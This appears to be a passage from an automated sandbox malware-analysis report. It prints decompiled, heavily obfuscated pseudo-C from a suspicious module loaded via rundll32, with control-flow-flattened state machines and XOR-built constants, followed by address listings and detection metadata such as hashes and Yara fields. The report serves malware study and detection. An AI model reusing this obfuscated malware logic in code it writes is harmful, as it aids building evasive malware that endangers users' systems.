				_v184 = _v184 + 0xffff4460;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x007fa2da;
				_v220 = 0xa2fe;
				_v220 = _v220 ^ 0x26ae9f9f;
				_v220 = _v220 + 0x1a1;
				_v220 = _v220 + 0xce68;
				_v220 = _v220 ^ 0x26af665c;
				_v228 = 0x162a;
				_v228 = _v228 ^ 0x1700eeb5;
				_v228 = _v228 << 1;
				_v228 = _v228 ^ 0x4a6b2f0a;
				_v228 = _v228 ^ 0x646a9864;
				_v136 = 0x1819;
				_v136 = _v136 * 0x25;
				_v136 = _v136 ^ 0x000331ed;
				_v160 = 0x36ca;
				_v160 = _v160 ^ 0xc92c8b7e;
				_v160 = _v160 ^ 0xc92cce0d;
				_v148 = 0xc5b6;
				_v148 = _v148 * 0x7e;
				_v148 = _v148 ^ 0x00614dee;
				_v140 = 0xa97e;
				_v140 = _v140 + 0xa055;
				_v140 = _v140 ^ 0x000126a3;
				_v172 = 0xe032;
				_v172 = _v172 * 0x70;
				_v172 = _v172 << 9;
				_v172 = _v172 ^ 0xc42bfcc6;
				_v216 = 0xe61f;
				_v216 = _v216 | 0xbe443d33;
				_v216 = _v216 ^ 0x414ec713;
				_t407 = 0x43;
				_v216 = _v216 / _t407;
				_v216 = _v216 ^ 0x03ce199c;
				_v192 = 0x9a2f;
				_v192 = _v192 | 0xaa1149b7;
				_v192 = _v192 ^ 0x2682361c;
				_v192 = _v192 ^ 0x8c93a9a4;
				_v152 = 0x8d56;
				_t408 = 0x7f;
				_v152 = _v152 * 0x29;
				_v152 = _v152 ^ 0x0016ef6a;
				_v236 = 0xbc0b;
				_v236 = _v236 << 0xd;
				_v236 = _v236 + 0xffff7a12;
				_v236 = _v236 << 6;
				_v236 = _v236 ^ 0xe036fcaf;
				_v144 = 0x49e;
				_v144 = _v144 / _t408;
				_v144 = _v144 ^ 0x000069ed;
				_v244 = 0x2abb;
				_t409 = 0x6f;
				_v244 = _v244 / _t409;
				_v244 = _v244 + 0xffff3ff3;
				_v244 = _v244 << 7;
				_v244 = _v244 ^ 0xffa00c82;
				_v232 = 0x26d8;
				_v232 = _v232 + 0xffffe69b;
				_v232 = _v232 + 0x4f22;
				_t410 = 0x3c;
				_v232 = _v232 / _t410;
				_v232 = _v232 ^ 0x00004984;
				_v188 = 0x4ffd;
				_v188 = _v188 | 0xb7e6561e;
				_v188 = _v188 >> 0xc;
				_v188 = _v188 ^ 0x000b053b;
				_v180 = 0x9e1b;
				_v180 = _v180 + 0xffffc996;
				_v180 = _v180 | 0x10dfcda5;
				_v180 = _v180 ^ 0x10dfd69b;
				_v196 = 0x4e8f;
				_t411 = 0x74;
				_v196 = _v196 / _t411;
				_v196 = _v196 + 0xe77b;
				_v196 = _v196 ^ 0x0000e576;
				_v132 = 0xd692;
				_t412 = 0x77;
				_v132 = _v132 / _t412;
				_v132 = _v132 ^ 0x0000067d;
				_v164 = 0xe38a;
				_t413 = 0x1d;
				_t414 = _v124;
				_v164 = _v164 / _t413;
				_v164 = _v164 ^ 0x0000547b;
				_v208 = 0x28b1;
				_v208 = _v208 + 0xffff4814;
				_v208 = _v208 << 9;
				_v208 = _v208 ^ 0xfee1d162;
				_v200 = 0x7d21;
				_v200 = _v200 ^ 0x0b7eb81b;
				_v200 = _v200 | 0x5335bde4;
				_v200 = _v200 ^ 0x5b7f914c;
				_v204 = 0xd16;
				_v204 = _v204 + 0xffff7a95;
				_v204 = _v204 + 0xffffd877;
				_v204 = _v204 ^ 0xffff6023;
				while(1) {
					L1:
					_t398 = _v248;
					do {
						while(1) {
							L2:
							_t426 = _t415 - 0x994cea2;
							if(_t426 > 0) {
								break;
							}
							if(_t426 == 0) {
								E02000FE4(_t368, _v128);
								_t415 = 0x15dfcb81;
								goto L9;
							} else {
								if(_t415 == 0x1d2cb9a) {
									_v116 = 0x6c;
									_t340 =  *0x2010400; // 0x0
									_t341 =  *0x2010400; // 0x0
									_t342 = E0200C3F6(_v236, _v240,  *((intOrPtr*)(_t341 + 0x18)), _v204, _v144, _v244, _v232, _v188,  *((intOrPtr*)(_t340 + 0x10)),  &_v108,  &_v116);
									_t424 = _t424 + 0x24;
									if(_t342 == 0) {
										_t415 = 0x994cea2;
									} else {
										_t373 =  &_v1;
										_t403 = _t414;
										do {
											 *_t403 =  *_t373;
											_t403 = _t403 + 1;
											_t373 = _t373 - 1;
										} while (_t373 >=  &_v96);
										_t415 = 0x479469f;
									}
									goto L9;
								} else {
									if(_t415 == 0x41ccc75) {
										_t415 = 0x2c907ec6;
										continue;
									} else {
										if(_t415 == 0x479469f) {
											_v112 = 0x14;
											_t263 = _t414 + 0x60; // 0x60
											_t344 = E01FF97D9(_t263, _v128, _t368, _v180,  &_v112, _v196, _v132, _v224, _v164);
											_t368 = _v252;
											_t424 = _t424 + 0x1c;
											_t398 = _v248;
											if(_t344 == 0) {
												continue;
											} else {
												_t415 = 0x994cea2;
												_t368 = 1;
												_v252 = 1;
												goto L1;
											}
											L34:
										} else {
											if(_t415 != 0x65513b8) {
												goto L32;
											} else {
												_t346 =  *0x2010400; // 0x0
												_t348 = E020031B5(_v124,  &_v120, _v140, _v172, _v128, _v216, _t368, _t398, _v192, _v152,  *((intOrPtr*)(_t346 + 0x10)));
												_t424 = _t424 + 0x28;
												asm("sbb esi, esi");
												_t415 = ( ~_t348 & 0xf83dfcf8) + 0x994cea2;
												L9:
												_t368 = _v252;
												while(1) {
													L1:
													_t398 = _v248;
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L33;
						}
						if(_t415 == 0x15dfcb81) {
							if(_t368 == 0) {
								E01FFDE81(_v156,  *_t366, _v212);
								_t368 = _v252;
							}
							_t415 = 0x1160f48c;
							goto L32;
						} else {
							if(_t415 == 0x269afaf2) {
								E01FF6374(_v160, _t398, _a4,  *_t422, _v148);
								_t424 = _t424 + 0xc;
								_t415 = 0x65513b8;
								goto L9;
							} else {
								if(_t415 == 0x2c907ec6) {
									_t352 = _a4 + 1;
									if((_t352 & 0x0000000f) != 0) {
										_t352 = (_t352 & 0xfffffff0) + 0x10;
									}
									 *((intOrPtr*)(_t366 + 4)) = _t352 + 0x74;
									_push(_t368);
									_t414 = E01FF54FB( *((intOrPtr*)(_t366 + 4)));
									 *_t366 = _t414;
									if(_t414 != 0) {
										_t297 = _t414 + 0x74; // 0x74
										_t398 = _t297;
										_t368 = _v252;
										_t415 = 0x3b15e045;
										_v120 = _a4;
										_v248 = _t297;
										_v124 =  *((intOrPtr*)(_t366 + 4)) - 0x74;
										goto L2;
									}
								} else {
									if(_t415 != 0x3b15e045) {
										goto L32;
									} else {
										_t360 =  *0x2010400; // 0x0
										_t362 = E01FF72A4(_v184,  &_v128, _v220, _v228, _t368, _v136,  *_t360);
										_t424 = _t424 + 0x18;
										asm("sbb esi, esi");
										_t415 = ( ~_t362 & 0x10bb2f71) + 0x15dfcb81;
										goto L9;
									}
								}
							}
						}
						break;
						L32:
						_t398 = _v248;
					} while (_t415 != 0x1160f48c);
					L33:
					return _v252;
					goto L34;
				}
			}






































































                                                                      0x0200aa82
                                                                      0x0200aa8c
                                                                      0x0200aa8d
                                                                      0x0200aa94
                                                                      0x0200aa96
                                                                      0x0200aa97
                                                                      0x0200aa98
                                                                      0x0200aa9d
                                                                      0x0200aaa5
                                                                      0x0200aaae
                                                                      0x0200aab0
                                                                      0x0200aab5
                                                                      0x0200aabb
                                                                      0x0200aac0
                                                                      0x0200aaca
                                                                      0x0200aacd
                                                                      0x0200aad1
                                                                      0x0200aad6
                                                                      0x0200aadb
                                                                      0x0200aae3
                                                                      0x0200aaeb
                                                                      0x0200aaf0
                                                                      0x0200aaf8
                                                                      0x0200ab00
                                                                      0x0200ab08
                                                                      0x0200ab10
                                                                      0x0200ab18
                                                                      0x0200ab20
                                                                      0x0200ab28
                                                                      0x0200ab30
                                                                      0x0200ab38
                                                                      0x0200ab40
                                                                      0x0200ab48
                                                                      0x0200ab4d
                                                                      0x0200ab55
                                                                      0x0200ab5d
                                                                      0x0200ab65
                                                                      0x0200ab6d
                                                                      0x0200ab72
                                                                      0x0200ab7a
                                                                      0x0200ab82
                                                                      0x0200ab8a
                                                                      0x0200ab8f
                                                                      0x0200ab97
                                                                      0x0200ab9f
                                                                      0x0200aba7
                                                                      0x0200abaf
                                                                      0x0200abb7
                                                                      0x0200abbf
                                                                      0x0200abc7
                                                                      0x0200abcf
                                                                      0x0200abd3
                                                                      0x0200abdb
                                                                      0x0200abe3
                                                                      0x0200abf6
                                                                      0x0200abfd
                                                                      0x0200ac08
                                                                      0x0200ac10
                                                                      0x0200ac18
                                                                      0x0200ac20
                                                                      0x0200ac2d
                                                                      0x0200ac31
                                                                      0x0200ac39
                                                                      0x0200ac44
                                                                      0x0200ac4f
                                                                      0x0200ac5a
                                                                      0x0200ac67
                                                                      0x0200ac6d
                                                                      0x0200ac72
                                                                      0x0200ac7a
                                                                      0x0200ac82
                                                                      0x0200ac8a
                                                                      0x0200ac98
                                                                      0x0200ac9d
                                                                      0x0200aca3
                                                                      0x0200acab
                                                                      0x0200acb3
                                                                      0x0200acbb
                                                                      0x0200acc3
                                                                      0x0200accb
                                                                      0x0200acd8
                                                                      0x0200acdb
                                                                      0x0200acdf
                                                                      0x0200ace7
                                                                      0x0200acef
                                                                      0x0200acf4
                                                                      0x0200acfc
                                                                      0x0200ad01
                                                                      0x0200ad09
                                                                      0x0200ad1f
                                                                      0x0200ad26
                                                                      0x0200ad31
                                                                      0x0200ad3d
                                                                      0x0200ad42
                                                                      0x0200ad48
                                                                      0x0200ad50
                                                                      0x0200ad55
                                                                      0x0200ad5d
                                                                      0x0200ad65
                                                                      0x0200ad6d
                                                                      0x0200ad79
                                                                      0x0200ad7e
                                                                      0x0200ad84
                                                                      0x0200ad8c
                                                                      0x0200ad94
                                                                      0x0200ad9c
                                                                      0x0200ada1
                                                                      0x0200ada9
                                                                      0x0200adb1
                                                                      0x0200adb9
                                                                      0x0200adc1
                                                                      0x0200adc9
                                                                      0x0200add5
                                                                      0x0200adda
                                                                      0x0200ade0
                                                                      0x0200ade8
                                                                      0x0200adf0
                                                                      0x0200ae02
                                                                      0x0200ae05
                                                                      0x0200ae0c
                                                                      0x0200ae17
                                                                      0x0200ae27
                                                                      0x0200ae2a
                                                                      0x0200ae31
                                                                      0x0200ae35
                                                                      0x0200ae3d
                                                                      0x0200ae45
                                                                      0x0200ae4d
                                                                      0x0200ae52
                                                                      0x0200ae5a
                                                                      0x0200ae62
                                                                      0x0200ae6a
                                                                      0x0200ae72
                                                                      0x0200ae7a
                                                                      0x0200ae82
                                                                      0x0200ae8a
                                                                      0x0200ae92
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200ae9e
                                                                      0x0200ae9e
                                                                      0x0200ae9e
                                                                      0x0200ae9e
                                                                      0x0200aea4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200aeaa
                                                                      0x0200b031
                                                                      0x0200b037
                                                                      0x00000000
                                                                      0x0200aeb0
                                                                      0x0200aeb6
                                                                      0x0200afa5
                                                                      0x0200afb9
                                                                      0x0200afd8
                                                                      0x0200afe8
                                                                      0x0200afed
                                                                      0x0200aff2
                                                                      0x0200b018
                                                                      0x0200aff4
                                                                      0x0200aff4
                                                                      0x0200affb
                                                                      0x0200affd
                                                                      0x0200afff
                                                                      0x0200b001
                                                                      0x0200b002
                                                                      0x0200b00a
                                                                      0x0200b00e
                                                                      0x0200b00e
                                                                      0x00000000
                                                                      0x0200aebc
                                                                      0x0200aec2
                                                                      0x0200af94
                                                                      0x00000000
                                                                      0x0200aec8
                                                                      0x0200aece
                                                                      0x0200af41
                                                                      0x0200af68
                                                                      0x0200af6b
                                                                      0x0200af70
                                                                      0x0200af74
                                                                      0x0200af77
                                                                      0x0200af7d
                                                                      0x00000000
                                                                      0x0200af83
                                                                      0x0200af85
                                                                      0x0200af8a
                                                                      0x0200af8b
                                                                      0x00000000
                                                                      0x0200af8b
                                                                      0x00000000
                                                                      0x0200aed0
                                                                      0x0200aed6
                                                                      0x00000000
                                                                      0x0200aedc
                                                                      0x0200aedc
                                                                      0x0200af13
                                                                      0x0200af18
                                                                      0x0200af1f
                                                                      0x0200af27
                                                                      0x0200af2d
                                                                      0x0200af2d
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x00000000
                                                                      0x0200ae9a
                                                                      0x0200ae9a
                                                                      0x0200aed6
                                                                      0x0200aece
                                                                      0x0200aec2
                                                                      0x0200aeb6
                                                                      0x00000000
                                                                      0x0200aeaa
                                                                      0x0200b047
                                                                      0x0200b12b
                                                                      0x0200b137
                                                                      0x0200b13d
                                                                      0x0200b13d
                                                                      0x0200b141
                                                                      0x00000000
                                                                      0x0200b04d
                                                                      0x0200b053
                                                                      0x0200b117
                                                                      0x0200b11c
                                                                      0x0200b11f
                                                                      0x00000000
                                                                      0x0200b059
                                                                      0x0200b05f
                                                                      0x0200b0b2
                                                                      0x0200b0b5
                                                                      0x0200b0ba
                                                                      0x0200b0ba
                                                                      0x0200b0c0
                                                                      0x0200b0ce
                                                                      0x0200b0d4
                                                                      0x0200b0d6
                                                                      0x0200b0db
                                                                      0x0200b0e0
                                                                      0x0200b0e0
                                                                      0x0200b0e3
                                                                      0x0200b0e7
                                                                      0x0200b0ec
                                                                      0x0200b0f9
                                                                      0x0200b0fd
                                                                      0x00000000
                                                                      0x0200b0fd
                                                                      0x0200b061
                                                                      0x0200b067
                                                                      0x00000000
                                                                      0x0200b06d
                                                                      0x0200b06d
                                                                      0x0200b090
                                                                      0x0200b095
                                                                      0x0200b09c
                                                                      0x0200b0a4
                                                                      0x00000000
                                                                      0x0200b0a4
                                                                      0x0200b067
                                                                      0x0200b05f
                                                                      0x0200b053
                                                                      0x00000000
                                                                      0x0200b146
                                                                      0x0200b146
                                                                      0x0200b14a
                                                                      0x0200b156
                                                                      0x0200b164
                                                                      0x00000000
                                                                      0x0200b164

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /kJ$!}$"O$2$l$vZ$v${T$Ma$i
                                                                      • API String ID: 0-820926959
                                                                      • Opcode ID: 32a2f9d8b3478e3ec80044164199ffb2d6203919a6996b17acfb5b8c23225709
                                                                      • Instruction ID: 89ffa27737dde4956a0a2f10d7c80f41133719b5d7ee473454011f1151af1635
                                                                      • Opcode Fuzzy Hash: 32a2f9d8b3478e3ec80044164199ffb2d6203919a6996b17acfb5b8c23225709
                                                                      • Instruction Fuzzy Hash: 110246725083809FE364CF25C889A5BFBE1BBC4358F048A1DF6E9962A0D7B5C945DF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF9106, Relevance: 12.8, Strings: 10, Instructions: 328COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E01FF9106(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* __ecx;
				void* _t286;
				signed int _t335;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				void* _t354;
				signed int* _t397;
				signed int* _t401;
				void* _t404;

				_t398 = _a12;
				_t397 = _a16;
				_push(_t397);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02002550(_t286);
				_v72 = 0x2367;
				_t401 =  &(( &_v172)[6]);
				_v72 = _v72 | 0x097ad610;
				_v72 = _v72 ^ 0x097ae8e2;
				_t354 = 0x1dc5535c;
				_v92 = 0x56dc;
				_v92 = _v92 + 0xce73;
				_v92 = _v92 ^ 0x000174de;
				_v108 = 0x5b94;
				_v108 = _v108 ^ 0x203ddd03;
				_v108 = _v108 << 0xa;
				_v108 = _v108 ^ 0xf61a093d;
				_v140 = 0x3ec5;
				_t342 = 0x2d;
				_v140 = _v140 / _t342;
				_v140 = _v140 + 0xffff0d7c;
				_t343 = 0x54;
				_v140 = _v140 * 0x56;
				_v140 = _v140 ^ 0xffae99ec;
				_v100 = 0x56eb;
				_v100 = _v100 + 0xbf92;
				_v100 = _v100 + 0xffffb004;
				_v100 = _v100 ^ 0x0000e62d;
				_v124 = 0xb6af;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 / _t343;
				_v124 = _v124 ^ 0x0000233e;
				_v120 = 0xde2;
				_t54 =  &_v120; // 0xde2
				_t344 = 0x4c;
				_v120 =  *_t54 / _t344;
				_v120 = _v120 * 0x3f;
				_v120 = _v120 ^ 0x00006eff;
				_v104 = 0xa720;
				_v104 = _v104 * 0x69;
				_v104 = _v104 + 0x1686;
				_v104 = _v104 ^ 0x0044923c;
				_v112 = 0xb3bf;
				_v112 = _v112 >> 1;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 ^ 0x00005d19;
				_v96 = 0x2a95;
				_v96 = _v96 >> 6;
				_v96 = _v96 + 0xbf11;
				_v96 = _v96 ^ 0x0000bd99;
				_v148 = 0xc1fd;
				_v148 = _v148 << 0xc;
				_v148 = _v148 * 0x31;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x42da2451;
				_v160 = 0xd54a;
				_t345 = 0x17;
				_v160 = _v160 / _t345;
				_v160 = _v160 | 0x2f8e477c;
				_v160 = _v160 + 0xffff9d16;
				_v160 = _v160 ^ 0x2f8dc8af;
				_v168 = 0x5d03;
				_v168 = _v168 + 0xffffafa9;
				_v168 = _v168 + 0xffff8780;
				_v168 = _v168 | 0x25100a61;
				_v168 = _v168 ^ 0xfffffc23;
				_v116 = 0x4d25;
				_t346 = 0x4a;
				_v116 = _v116 / _t346;
				_t347 = 0x45;
				_v116 = _v116 / _t347;
				_v116 = _v116 ^ 0x00001bc5;
				_v152 = 0xf56f;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 + 0xffff6840;
				_v152 = _v152 | 0xadc68f8a;
				_v152 = _v152 ^ 0xffffbd08;
				_v172 = 0xb7ce;
				_v172 = _v172 >> 9;
				_v172 = _v172 >> 4;
				_v172 = _v172 << 0xd;
				_v172 = _v172 ^ 0x0000b2e5;
				_v80 = 0x57d2;
				_v80 = _v80 ^ 0xaa637a5b;
				_v80 = _v80 ^ 0xaa6340a6;
				_v156 = 0xb744;
				_v156 = _v156 + 0x63ef;
				_t348 = 0x7c;
				_v156 = _v156 / _t348;
				_v156 = _v156 ^ 0xd73448d2;
				_v156 = _v156 ^ 0xd7344e9f;
				_v132 = 0x174e;
				_t349 = 0x78;
				_v132 = _v132 * 0x65;
				_v132 = _v132 | 0x3b954933;
				_v132 = _v132 ^ 0xbecd0e21;
				_v132 = _v132 ^ 0x85504ce6;
				_v164 = 0x7af9;
				_v164 = _v164 << 9;
				_v164 = _v164 >> 7;
				_v164 = _v164 * 0x41;
				_v164 = _v164 ^ 0x007cf7ff;
				_v136 = 0x7571;
				_v136 = _v136 + 0xffff8152;
				_v136 = _v136 | 0x8539ecc8;
				_v136 = _v136 / _t349;
				_v136 = _v136 ^ 0x022226c3;
				_v88 = 0xe259;
				_v88 = _v88 * 0x74;
				_v88 = _v88 ^ 0x0066854f;
				_v144 = 0x1b27;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x66;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x00005892;
				_v76 = 0x4fda;
				_v76 = _v76 ^ 0xefbec303;
				_v76 = _v76 ^ 0xefbe9eae;
				_v84 = 0x12ec;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x0012dc80;
				_v128 = 0x576c;
				_t350 = 0x3e;
				_v128 = _v128 / _t350;
				_t351 = 0x79;
				_v128 = _v128 / _t351;
				_v128 = _v128 + 0x759e;
				_v128 = _v128 ^ 0x000075a0;
				goto L1;
				do {
					while(1) {
						L1:
						_t404 = _t354 - 0x1cceac70;
						if(_t404 > 0) {
							break;
						}
						if(_t404 == 0) {
							E01FFF834( *((intOrPtr*)(_t398 + 0xc)), _v160,  &_v68, _v168);
							_t401 =  &(_t401[2]);
							_t354 = 0x326fdce7;
							continue;
						} else {
							if(_t354 == 0x828a2c) {
								E01FFF834( *((intOrPtr*)(_t398 + 0x14)), _v172,  &_v68, _v80);
								_t401 =  &(_t401[2]);
								_t354 = 0x10364e2a;
								continue;
							} else {
								if(_t354 == 0xc083f5a) {
									E01FFFEE3(_t397,  &_v68, _v108, _v140, _v100, _v124);
									_t401 =  &(_t401[4]);
									_t354 = 0x223ac297;
									continue;
								} else {
									if(_t354 == 0x10364e2a) {
										E01FFBAD2(_v156, _v132, __eflags, _t398 + 0x18,  &_v68, _v164);
										_t401 =  &(_t401[3]);
										_t354 = 0x1e572357;
										continue;
									} else {
										if(_t354 == 0x17d7bd79) {
											E01FFF834( *((intOrPtr*)(_t398 + 8)), _v96,  &_v68, _v148);
											_t401 =  &(_t401[2]);
											_t354 = 0x1cceac70;
											continue;
										} else {
											if(_t354 == 0x18be4013) {
												_push(_t354);
												_t335 = E01FF54FB(_t397[1]);
												 *_t397 = _t335;
												__eflags = _t335;
												if(__eflags != 0) {
													_t354 = 0xc083f5a;
													continue;
												}
											} else {
												if(_t354 != 0x19774c23) {
													goto L28;
												} else {
													E01FFF834( *((intOrPtr*)(_t398 + 0x28)), _v76,  &_v68, _v84);
												}
											}
										}
									}
								}
							}
						}
						L10:
						return 0 |  *_t397 != 0x00000000;
					}
					__eflags = _t354 - 0x1dc5535c;
					if(_t354 == 0x1dc5535c) {
						_t354 = 0x210e94e8;
						 *_t397 =  *_t397 & 0x00000000;
						__eflags =  *_t397;
						_t397[1] = _v128;
						goto L28;
					} else {
						__eflags = _t354 - 0x1e572357;
						if(__eflags == 0) {
							E01FFBAD2(_v136, _v88, __eflags, _t398 + 0x20,  &_v68, _v144);
							_t401 =  &(_t401[3]);
							_t354 = 0x19774c23;
							goto L1;
						} else {
							__eflags = _t354 - 0x210e94e8;
							if(_t354 == 0x210e94e8) {
								_t397[1] = E0200DBC4(_t398);
								_t354 = 0x18be4013;
								goto L1;
							} else {
								__eflags = _t354 - 0x223ac297;
								if(__eflags == 0) {
									E01FFBAD2(_v120, _v104, __eflags, _t398,  &_v68, _v112);
									_t401 =  &(_t401[3]);
									_t354 = 0x17d7bd79;
									goto L1;
								} else {
									__eflags = _t354 - 0x326fdce7;
									if(_t354 != 0x326fdce7) {
										goto L28;
									} else {
										E01FFF834( *((intOrPtr*)(_t398 + 0x10)), _v116,  &_v68, _v152);
										_t401 =  &(_t401[2]);
										_t354 = 0x828a2c;
										goto L1;
									}
								}
							}
						}
					}
					goto L10;
					L28:
					__eflags = _t354 - 0x3b76f47b;
				} while (__eflags != 0);
				goto L10;
			}















































                                                                      0x01ff910f
                                                                      0x01ff9117
                                                                      0x01ff911e
                                                                      0x01ff911f
                                                                      0x01ff9120
                                                                      0x01ff9127
                                                                      0x01ff912e
                                                                      0x01ff9130
                                                                      0x01ff9135
                                                                      0x01ff9140
                                                                      0x01ff9143
                                                                      0x01ff914d
                                                                      0x01ff9155
                                                                      0x01ff915a
                                                                      0x01ff9162
                                                                      0x01ff916a
                                                                      0x01ff9172
                                                                      0x01ff917a
                                                                      0x01ff9182
                                                                      0x01ff9187
                                                                      0x01ff918f
                                                                      0x01ff919d
                                                                      0x01ff91a2
                                                                      0x01ff91a8
                                                                      0x01ff91b5
                                                                      0x01ff91b8
                                                                      0x01ff91bc
                                                                      0x01ff91c4
                                                                      0x01ff91cc
                                                                      0x01ff91d4
                                                                      0x01ff91dc
                                                                      0x01ff91e4
                                                                      0x01ff91ec
                                                                      0x01ff91f9
                                                                      0x01ff91fd
                                                                      0x01ff9205
                                                                      0x01ff920d
                                                                      0x01ff9211
                                                                      0x01ff9214
                                                                      0x01ff921d
                                                                      0x01ff9221
                                                                      0x01ff9229
                                                                      0x01ff9236
                                                                      0x01ff923a
                                                                      0x01ff9242
                                                                      0x01ff924a
                                                                      0x01ff9252
                                                                      0x01ff9256
                                                                      0x01ff925b
                                                                      0x01ff9263
                                                                      0x01ff926b
                                                                      0x01ff9270
                                                                      0x01ff9278
                                                                      0x01ff9280
                                                                      0x01ff9288
                                                                      0x01ff9292
                                                                      0x01ff9296
                                                                      0x01ff929b
                                                                      0x01ff92a5
                                                                      0x01ff92b3
                                                                      0x01ff92b8
                                                                      0x01ff92be
                                                                      0x01ff92c6
                                                                      0x01ff92ce
                                                                      0x01ff92d6
                                                                      0x01ff92de
                                                                      0x01ff92e6
                                                                      0x01ff92ee
                                                                      0x01ff92f6
                                                                      0x01ff92fe
                                                                      0x01ff930a
                                                                      0x01ff930f
                                                                      0x01ff9319
                                                                      0x01ff931e
                                                                      0x01ff9324
                                                                      0x01ff932c
                                                                      0x01ff9334
                                                                      0x01ff9339
                                                                      0x01ff9341
                                                                      0x01ff9349
                                                                      0x01ff9351
                                                                      0x01ff9359
                                                                      0x01ff935e
                                                                      0x01ff9363
                                                                      0x01ff9368
                                                                      0x01ff9370
                                                                      0x01ff9378
                                                                      0x01ff9380
                                                                      0x01ff9388
                                                                      0x01ff9390
                                                                      0x01ff939c
                                                                      0x01ff93a1
                                                                      0x01ff93a7
                                                                      0x01ff93af
                                                                      0x01ff93b7
                                                                      0x01ff93c4
                                                                      0x01ff93c5
                                                                      0x01ff93c9
                                                                      0x01ff93d1
                                                                      0x01ff93d9
                                                                      0x01ff93e1
                                                                      0x01ff93e9
                                                                      0x01ff93ee
                                                                      0x01ff93f8
                                                                      0x01ff93fc
                                                                      0x01ff9404
                                                                      0x01ff940c
                                                                      0x01ff9414
                                                                      0x01ff9422
                                                                      0x01ff9426
                                                                      0x01ff942e
                                                                      0x01ff943b
                                                                      0x01ff943f
                                                                      0x01ff9447
                                                                      0x01ff944f
                                                                      0x01ff9459
                                                                      0x01ff945d
                                                                      0x01ff9462
                                                                      0x01ff946a
                                                                      0x01ff9474
                                                                      0x01ff9481
                                                                      0x01ff9489
                                                                      0x01ff9491
                                                                      0x01ff9496
                                                                      0x01ff949e
                                                                      0x01ff94ac
                                                                      0x01ff94b1
                                                                      0x01ff94bb
                                                                      0x01ff94c3
                                                                      0x01ff94c7
                                                                      0x01ff94cf
                                                                      0x01ff94cf
                                                                      0x01ff94d7
                                                                      0x01ff94d7
                                                                      0x01ff94d7
                                                                      0x01ff94d7
                                                                      0x01ff94d9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff94df
                                                                      0x01ff960a
                                                                      0x01ff960f
                                                                      0x01ff9612
                                                                      0x00000000
                                                                      0x01ff94e5
                                                                      0x01ff94eb
                                                                      0x01ff95e8
                                                                      0x01ff95ed
                                                                      0x01ff95f0
                                                                      0x00000000
                                                                      0x01ff94f1
                                                                      0x01ff94f3
                                                                      0x01ff95c6
                                                                      0x01ff95cb
                                                                      0x01ff95ce
                                                                      0x00000000
                                                                      0x01ff94f9
                                                                      0x01ff94ff
                                                                      0x01ff959e
                                                                      0x01ff95a3
                                                                      0x01ff95a6
                                                                      0x00000000
                                                                      0x01ff9505
                                                                      0x01ff950b
                                                                      0x01ff957a
                                                                      0x01ff957f
                                                                      0x01ff9582
                                                                      0x00000000
                                                                      0x01ff950d
                                                                      0x01ff9513
                                                                      0x01ff9556
                                                                      0x01ff9557
                                                                      0x01ff955c
                                                                      0x01ff955f
                                                                      0x01ff9561
                                                                      0x01ff9563
                                                                      0x00000000
                                                                      0x01ff9563
                                                                      0x01ff9515
                                                                      0x01ff951b
                                                                      0x00000000
                                                                      0x01ff9521
                                                                      0x01ff9531
                                                                      0x01ff9536
                                                                      0x01ff951b
                                                                      0x01ff9513
                                                                      0x01ff950b
                                                                      0x01ff94ff
                                                                      0x01ff94f3
                                                                      0x01ff94eb
                                                                      0x01ff9539
                                                                      0x01ff954a
                                                                      0x01ff954a
                                                                      0x01ff961c
                                                                      0x01ff9622
                                                                      0x01ff96d1
                                                                      0x01ff96d6
                                                                      0x01ff96d6
                                                                      0x01ff96d9
                                                                      0x00000000
                                                                      0x01ff9628
                                                                      0x01ff9628
                                                                      0x01ff962e
                                                                      0x01ff96bb
                                                                      0x01ff96c0
                                                                      0x01ff96c3
                                                                      0x00000000
                                                                      0x01ff9630
                                                                      0x01ff9630
                                                                      0x01ff9636
                                                                      0x01ff9699
                                                                      0x01ff969c
                                                                      0x00000000
                                                                      0x01ff9638
                                                                      0x01ff9638
                                                                      0x01ff963e
                                                                      0x01ff9680
                                                                      0x01ff9685
                                                                      0x01ff9688
                                                                      0x00000000
                                                                      0x01ff9640
                                                                      0x01ff9640
                                                                      0x01ff9646
                                                                      0x00000000
                                                                      0x01ff964c
                                                                      0x01ff965c
                                                                      0x01ff9661
                                                                      0x01ff9664
                                                                      0x00000000
                                                                      0x01ff9664
                                                                      0x01ff9646
